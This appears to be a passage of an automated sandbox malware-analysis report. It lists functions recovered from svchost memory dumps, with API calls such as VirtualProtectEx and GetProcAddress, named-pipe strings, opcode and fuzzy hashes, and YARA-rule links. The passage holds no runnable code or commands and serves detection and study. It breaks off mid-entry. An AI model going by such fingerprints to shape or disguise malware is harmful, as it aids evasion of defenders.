FreeLibrary.KERNEL32 ref: 00000179537AA187

Strings

mscoree.dll, xrefs: 00000179537AA14B
CorExitProcess, xrefs: 00000179537AA163

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 73b6b03aab83e1f99a9798063c3f49f6cbb5a15b6ebe00f4a351a76d1d355aef
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 2EF08271B29A54A1FF864FA0E8A43E52370EF49B88F04241B954F46360EF38C4DCCB10

Function 0000017953D4A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000017953D4A154
GetProcAddress.KERNEL32 ref: 0000017953D4A16A
FreeLibrary.KERNEL32 ref: 0000017953D4A187

Strings

CorExitProcess, xrefs: 0000017953D4A163
mscoree.dll, xrefs: 0000017953D4A14B

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 0c04b921a9b410b6f166b68d2e862303f23bc6912795505d241f09e58222c7b8
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 14F01271319B5491FF574FA0F8843E923B0AB58B98F44201B994F46964DF6CC59CC700

Function 00000179537A51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000179537A5236

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 0468c56e32e5ecdb93a49922f01a9dced457731f4c5f6c1fead8d90b8d7d76dc
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 5902A93662DB9086E761CB59E49439AB7B1F3C5798F104116EACE87BA8DF7CC448CB40

Function 0000017953D451B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017953D45236

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: a8b803c9f3b0ee84c12c6eec875a5d35ab47494d9e0bfc3170ef25e1641000c8
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 3F02BC3611DB9486EB61CB59E49439AB7B1F3C5798F104116EA8E87B68DFBCC498CB00

Function 00000179537B0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000179537B08A2
GetConsoleMode.KERNEL32 ref: 00000179537B0960
GetLastError.KERNEL32 ref: 00000179537B09EA

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: f04de11a177723f6a12d5930976192a82fc46b7b5d768117d5fc1aa130b5f10a
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: FE81CE32E28A7489FB529B6598A03ED2BB1F746B8CF444517DE4E53B92FB34844EC710

Function 0000017953D50860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000017953D508A2
GetConsoleMode.KERNEL32 ref: 0000017953D50960
GetLastError.KERNEL32 ref: 0000017953D509EA

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: e9bf900f22b3ca95ac7582406c0d7b3979c2cb72aeca3c50aeed9c95934cee2e
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 1481BC32618A6089FB62AF6598807ED2BF1F794B9CF444117DE4E63F96EB34844DC710

Function 00000179537A57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000179537A5806

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 5a11ddcfa039438ed463471aaed5abd3b60112fcee3bb98f83115015e23af584
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: B961BA3692DB94C6E7618B19E49435AB7B0F389768F100116FACD87BA8DB7CC548CF40

Function 0000017953D457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017953D45806

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: e7194792c7a7624c00be057d4555403ae848d75e92fe035f4fa726bbfe8f50e2
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: B361B77651DB54C6EB619B19E49439AB7F1F388788F100116FA8E87BA8DBBCC548CF40

Function 00000179537B1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000179537B1EE0
_set_statfp.LIBCMT ref: 00000179537B1EFB
_set_statfp.LIBCMT ref: 00000179537B1F17
_set_statfp.LIBCMT ref: 00000179537B1F53

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 10caee5077c3ef502bec3471ed2fb945522b50dfd098a07731f745d70388336d
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 2011A332E5EA30C9F69A1168E4763E513716B6737CF044636FA7E067D7EB148C49C100

Function 00000179537812B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000179537812E0
_set_statfp.LIBCMT ref: 00000179537812FB
_set_statfp.LIBCMT ref: 0000017953781317
_set_statfp.LIBCMT ref: 0000017953781353

Memory Dump Source

Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: ad0af8ccf25c9a2e923504ff5f7ec24561113f6063c2958b79c18a5040c978d4
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 1511E932E5CE3001F6671165E4923E993707B6F77CF484737AA7F46FD68A188C494101

Function 0000017953D51EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000017953D51EE0
_set_statfp.LIBCMT ref: 0000017953D51EFB
_set_statfp.LIBCMT ref: 0000017953D51F17
_set_statfp.LIBCMT ref: 0000017953D51F53

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: c0534e1f103526e3930e95b505158ccc66963acafab619b8ed5bfee4d88b7b63
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 4511A333A5CA3141FA9A1164E4563E913F07B753BCF050626AA7E87FD7AB548D494300

Function 00000179537A3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000179537A3886
GetCurrentProcess.KERNEL32 ref: 00000179537A38B4
VirtualProtectEx.KERNEL32 ref: 00000179537A38D6
GetCurrentProcess.KERNEL32 ref: 00000179537A38F4
VirtualProtectEx.KERNEL32 ref: 00000179537A3915

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 741cd371535e58e4f55e2cdc5e18ad35b61bb847470f44393e0482604e6d7ada
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 1C113C3AB18B5482FB169F91F4146A9A7B5FB4AB88F04002ADE8D07B94FF3DC548C700

Function 0000017953D43878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000017953D43886
GetCurrentProcess.KERNEL32 ref: 0000017953D438B4
VirtualProtectEx.KERNEL32 ref: 0000017953D438D6
GetCurrentProcess.KERNEL32 ref: 0000017953D438F4
VirtualProtectEx.KERNEL32 ref: 0000017953D43915

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 5ef8119f26d26c6f51f6e64c5e8f526c4b61e41789b728723e7e64dfcb2fb927
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 7E115E3A708B5083EB169BA5F4047AAA7B0F748B88F04042ADE8D07B94EF3DC51CC700

Function 00000179537784F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017953778503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017953778598

Strings

csm, xrefs: 000001795377857E
f, xrefs: 0000017953778516

Memory Dump Source

Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 31aee347fee61d2d614974f151fdafca9f87d8d84b0641efe70a5bb4441efe65
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 8051D132B1A220AADB27DF25E445B9837F5F342BDCF518126DA0E87789DB34E849C705

Function 00000179537784D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017953778503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017953778598

Strings

csm, xrefs: 000001795377857E
f, xrefs: 0000017953778516

Memory Dump Source

Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: b0723f28f7a0575ea5fdd575e6fa23e0190c7b56bffab0f33ecf9d8e6447e11b
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: E131EE72A09660A6E713DF12E885B9937F8F342BDCF158116EE4E07784CB38E949C709

Function 00000179537A14B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000179537A14D5
HeapFree.KERNEL32 ref: 00000179537A14E4
GetProcessHeap.KERNEL32 ref: 00000179537A14F0
HeapFree.KERNEL32 ref: 00000179537A14FF
GetProcessHeap.KERNEL32 ref: 00000179537A152A

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction ID: 3302e18425058611f86b48afbc7a7a9cc7d1bf90f6bb5665c9e7b62b11099c6e
Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
Instruction Fuzzy Hash: E211B236918FA896F752CFA6A81429A7774F78AF88F04401ADB8E03714EF38C095C700

Function 00000179537A26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000179537A27D4
StrCpyW.SHLWAPI ref: 00000179537A27ED

Strings

\\.\pipe\, xrefs: 00000179537A27DF

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 6365e74ea41314e2c76e16990aea213b6aecc0aa63ce0f0888ada0406651787d
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: C671F432A2C7A185E76ADF6599543EAA7B0F746B8CF440017DE4D57B88DF35CA88C700

Function 0000017953D426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017953D427D4
StrCpyW.SHLWAPI ref: 0000017953D427ED

Strings

\\.\pipe\, xrefs: 0000017953D427DF

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 841b4bbb1c2aae61a077ab825e40647a98d0d66a3117e0e7e84a6c4aa514df95
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 2971D2722187A186EB769F6A99443EEA7B1F748B8CF440017DE8D43B89DEB5C60CC740

Function 00000179537A24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000179537A25C3
StrCpyW.SHLWAPI ref: 00000179537A25DA

Strings

\\.\pipe\, xrefs: 00000179537A25CE

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 684cc52012bf08a02ea854e3c5e00fd2e482725b670355f3805120c974a84c5f
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 4651F732A2D7A182E6769E29E1543EA6771F387788F000027CD8E03F99DE35C4898B40

Function 0000017953D424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017953D425C3
StrCpyW.SHLWAPI ref: 0000017953D425DA

Strings

\\.\pipe\, xrefs: 0000017953D425CE

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 6c60b4d3f03c60b87fae5669e464e306287a3577044a8185eb26f4003221b5c7
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: E851E93220C7A142E777EF2AE5543EAA7B1F385788F454027DE8E03B99CEB5C4098B40

Function 00000179537B0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000179537B071B
GetLastError.KERNEL32 ref: 00000179537B073D

Strings

U, xrefs: 00000179537B06C7

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: b43d16757bf5e9589a98c71ae9370e20613dc249c4dd67caf5abf271398e3e89
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: F841C672B18A9482EB21DF25E4543DAB7B1F789788F404026EE8D87798EF3CC545CB40

Function 0000017953D50604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000017953D5071B
GetLastError.KERNEL32 ref: 0000017953D5073D

Strings

U, xrefs: 0000017953D506C7

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: e59b5f175e4c890c155bae94444f65b5e8e3f628d710972a0f8f93c7c4adde9c
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 2E41A372319A5082EB219F25E4443DAA7B0F788788F504026EE8D87B98DB7CC545CB40

Function 00000179537AD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000179537AD6F9
LCMapStringW.KERNEL32 ref: 00000179537AD781

Strings

LCMapStringEx, xrefs: 00000179537AD6DC, 00000179537AD6ED

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 41f5f8c1b6d9781716885eb7728698c86a40eb5a14e32fd4e6294361c62e05b2
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: FC114A36A08B9086DB65CB56F45029AB7B4F7CABC4F54412AEE8D83B59DF38C554CB00

Function 0000017953D4D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000017953D4D6F9
LCMapStringW.KERNEL32 ref: 0000017953D4D781

Strings

LCMapStringEx, xrefs: 0000017953D4D6DC, 0000017953D4D6ED

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 56865a3138f0fa5c383209f95c9c6dd944c088f6238ac715f738dd5f569e7bca
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: A8110636608B9086D761CB56B48069AB7B4F7C9B94F544126EE8E83B59DF38C5588B00

Function 00000179537A94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000179537A94E8
RaiseException.KERNEL32 ref: 00000179537A952E

Strings

csm, xrefs: 00000179537A951B

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: d9042d3ab88ee03dd59a299df3f7f2bc7607c62d41262829ace1d5b1cd0866a9
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 8B111F32618B9482EB618F15E44029E77B5F789B98F184222DF8D07764EF3CC555CB00

Function 0000017953D494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000017953D494E8
RaiseException.KERNEL32 ref: 0000017953D4952E

Strings

csm, xrefs: 0000017953D4951B

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 35dab9fdd70e0aba8154ea3a0721de1dcb63ab0178392f21c6a1abd3b65b2230
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: B5111C32618B9082EB668F15F44039977F5F788B98F184222DF8D0BB68DF78C559CB00

Function 00000179537AD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000179537AD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000179537AD6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000179537AD681

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 97157dce8ab8c9e342e1a495dafd4371ef732dfcfaa4e487683373aa742c3c2c
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 0BF0A731B287A091FB07AB85F4506D56331EB89BD8F495027EA5D13B54DF38C9ADC700

Function 0000017953D4D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000017953D4D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000017953D4D6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000017953D4D681

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 6dbab020d7271c260022a4a82442732b0884924286e54c0759775da47405c1b3
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
